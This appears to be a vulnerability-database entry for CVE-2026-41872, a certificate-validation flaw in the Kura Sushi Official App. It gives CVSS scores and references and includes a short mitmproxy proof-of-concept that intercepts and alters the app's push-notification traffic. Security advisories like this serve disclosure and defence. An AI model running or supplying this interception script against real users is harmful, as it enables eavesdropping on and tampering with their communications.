Security Vulnerability Report
CVE-2026-41872 CVSS 7.4 HIGH

CVE-2026-41872

Published: 2026-05-12 06:16:09
Last Modified: 2026-05-12 06:16:09

Description

"Kura Sushi Official App" provided by EPG, Inc. is vulnerable to improper certificate validation. A man-in-the-middle attack may allow eavesdropping on, or altering, the communication on push notifications between the affected application and the relevant server.

CVSS Details

CVSS 3.0 Score: 7.4
Severity: HIGH
CVSS 3.0 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
CVSS 4.0 Score (secondary, from the raw record below): 9.1, CRITICAL
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-295 (Improper Certificate Validation)

Configurations (Affected Products)

No configuration data available.

Kura Sushi Official App (no specific affected version is given in the record; refer to the official app store update history)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept: Demonstrating a Man-in-the-Middle (MitM) setup to intercept traffic.
# This requires the attacker to be on the same network as the victim.
# Tools like mitmproxy can be used because the app accepts any certificate.
from mitmproxy import http


class Interceptor:
    def request(self, flow: http.HTTPFlow) -> None:
        # Log the intercepted request URL and headers
        print(f"[+] Intercepted Request: {flow.request.pretty_url}")
        print(f"[+] Headers: {flow.request.headers}")

    def response(self, flow: http.HTTPFlow) -> None:
        # Check if the traffic is related to push notifications
        path = flow.request.path.lower()
        if "push" in path or "notification" in path:
            print("[+] Sensitive Push Notification Traffic Detected!")
            # Example of tampering with the response (Integrity impact demonstration)
            original_content = flow.response.content
            print(f"[+] Original Payload: {original_content}")
            # Inject a test message to prove tampering capability
            modified_content = original_content.replace(b"status", b"tampered_status")
            flow.response.content = modified_content
            print(f"[+] Modified Payload Sent to App: {modified_content}")


# Addons configuration for mitmproxy
addons = [Interceptor()]
```

References

- https://jvn.jp/en/jp/JVN38632731/
- https://apps.apple.com/jp/app/id942355925
- https://play.google.com/store/apps/details?id=jp.co.kura_corpo&hl=ja

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-41872", "sourceIdentifier": "[email protected]", "published": "2026-05-12T06:16:09.400", "lastModified": "2026-05-12T06:16:09.400", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "\"Kura Sushi Official App\" provided by EPG, Inc. is vulnerable to improper certificate validation. A man-in-the-middle attack may allow eavesdropping on, or altering, the communication on push notifications between the affected application and the relevant server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://apps.apple.com/jp/app/id942355925", "source": "[email protected]"}, {"url": "https://jvn.jp/en/jp/JVN38632731/", "source": "[email protected]"}, {"url": "https://play.google.com/store/apps/details?id=jp.co.kura_corpo&hl=ja", "source": "[email protected]"}]}}
```